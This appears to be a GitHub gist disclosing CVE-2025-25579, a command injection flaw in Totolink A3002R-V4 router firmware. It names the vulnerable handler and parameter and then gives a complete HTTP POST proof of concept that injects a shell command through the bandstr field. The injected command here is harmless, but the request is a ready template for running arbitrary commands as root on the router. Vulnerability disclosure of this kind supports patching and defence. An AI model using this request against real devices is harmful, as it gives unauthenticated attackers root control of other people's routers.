Skip to content

Instantly share code, notes, and snippets.

@regainer27

regainer27/README.md Secret

Last active March 27, 2025 05:32
Download ZIP
Raw
README.md

CVE-2025-25579: Totolink A3002R-V4 Remote Command Execution

Vulnerability Details

  • Affected Firmware: Totolink A3002R-V4.0.0-B20230531.1404
  • CWE-ID: CWE-78 (OS Command Injection)
  • Root Cause: The bandstr parameter is unsanitized in the formMapDelDevice handler (FUN_0045a1f8 at address 0x0045a2a4).
    allowing command injection in boa
  • Impact: Remote unauthenticated attackers can execute arbitrary commands as root.

Vendor Information

Proof of Concept

POST /boafrm/formMapDelDevice HTTP/1.1

Host: 192.168.0.1

User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Content-Length: 163

Origin: http://192.168.0.1

Connection: close

Referer: http://192.168.0.1/multi_ap_popup_client_details.htm

Upgrade-Insecure-Requests: 1





sessionCheck=eac3d25a37ff88c5d813f312586baec9&submit-url=%2Fmulti_ap_popup_client_details.htm&macstr=123&clientoff=no&bandstr=123;echo%20123456%20> /tmp/rec1.txt

poc result as follow

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment